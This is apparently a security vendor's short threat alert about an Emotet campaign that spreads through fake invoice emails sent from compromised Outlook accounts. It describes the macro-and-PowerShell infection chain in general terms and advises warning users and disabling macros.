Not only does the latest version of Emotet steal a variety of credentials from its victims, it also raids their Outlook account for names and email addresses, then uses it to send out spam messages designed to spread the infection.
A new wave of Emotet trojan infections is spreading via phishing emails sent from compromised Outlook accounts.
The emails are disguised to look like invoice notices sent by contacts the recipient has emailed in the past, perhaps even recently. They include a link that downloads a malicious Word document.
Emotet has traditionally been recognized as a banking trojan, though in this case it appears to be serving as more of a general credential stealer and potentially a downloader for additional malware.
These attacks rely on an Office macro hidden in the "invoice" Word doc to download the Emotet payload using a PowerShell command. Barkly sees that suspicious behavior and blocks it before the command can be completed. Watch for yourself in the video below:
Phishing emails with fake invoices aren't exactly a new threat, but when they come from a vendor your company uses they can be convincing. Share this alert with your users so they can be especially wary of this threat, and if possible, consider disabling macros by default across your organization.
Get the latest security news, tips, and trends straight to your inbox.